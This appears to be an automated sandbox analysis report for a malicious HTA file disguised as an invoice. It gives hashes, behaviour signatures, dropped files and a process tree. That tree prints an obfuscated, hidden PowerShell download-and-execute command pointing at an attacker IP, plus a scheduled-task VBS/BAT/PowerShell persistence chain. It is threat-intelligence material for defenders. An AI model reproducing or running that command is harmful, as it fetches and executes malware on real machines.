Analysis

  • max time kernel
    128s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231023-en, locale:en-us, os:windows7-x64, system
  • submitted
    15/11/2023, 17:34

General

  • Target

    16112023_0133_15112023_Invoice#2356876431.hta

  • Size

    371B

  • MD5

    99153607b1542d57391bb96f7f6501a8

  • SHA1

    87496ae7cb23b015fb8da73af5f0fd7fc1373aa2

  • SHA256

    c08e13a2fe6a0b69b2c67f0fbd73c72c7c49bbdedef556da6b57197f995979e1

  • SHA512

    2f2bf163d4f646421dcbb1a0110007ac87701c81e57ac89335ca477784e976985d6bee92b79d1be73b327ecbfddfb399ce5a45ead6dc8f223be6d15a28cf850c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta"
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2704
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {0BB06A32-9F4E-44DC-822A-1C2DA145C618} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Users\Public\Conted.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2788

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7C56MLPQ9URVD4E08GK6.temp

          Filesize

          7KB

          MD5

          b736b7049ac70ea3c2bde2fa7c318379

          SHA1

          6e34afeefd821bfc50417181197157cc7a980ba0

          SHA256

          a10aeb64e89586ddc3de876ca9edbf394a4fe80fb89f97ff26aa5b6674ef8201

          SHA512

          3f2002fd6a90f3725962e6b251d6d6e40996339596a93c2b1fb21a00e93482f1c1cf4348529248ba809f43f0940d98c9f6f8ae67adcfb7c68a4efc18e07f99a6

        • C:\Users\Public\Conted.bat

          Filesize

          205B

          MD5

          759278dd3dc3679bf7efd1ec681c0aa1

          SHA1

          72b37494696deea940ac75b4c4e06e2b6ce419ef

          SHA256

          cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19

          SHA512

          8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

        • C:\Users\Public\Conted.vbs

          Filesize

          688B

          MD5

          110da9d3474ba64fa1a18c173685c25d

          SHA1

          9f093829518a9268bf9807fda7bef47e7832c497

          SHA256

          a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60

          SHA512

          ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

        • memory/2704-9-0x0000000071460000-0x0000000071A0B000-memory.dmp

          Filesize

          5.7MB

        • memory/2704-3-0x0000000071460000-0x0000000071A0B000-memory.dmp

          Filesize

          5.7MB

        • memory/2704-6-0x00000000026E0000-0x0000000002720000-memory.dmp

          Filesize

          256KB

        • memory/2704-5-0x00000000026E0000-0x0000000002720000-memory.dmp

          Filesize

          256KB

        • memory/2704-4-0x0000000071460000-0x0000000071A0B000-memory.dmp

          Filesize

          5.7MB

        • memory/2788-19-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

          Filesize

          9.6MB

        • memory/2788-20-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2788-21-0x000000001B110000-0x000000001B3F2000-memory.dmp

          Filesize

          2.9MB

        • memory/2788-22-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2788-23-0x0000000002320000-0x0000000002328000-memory.dmp

          Filesize

          32KB

        • memory/2788-24-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2788-25-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

          Filesize

          9.6MB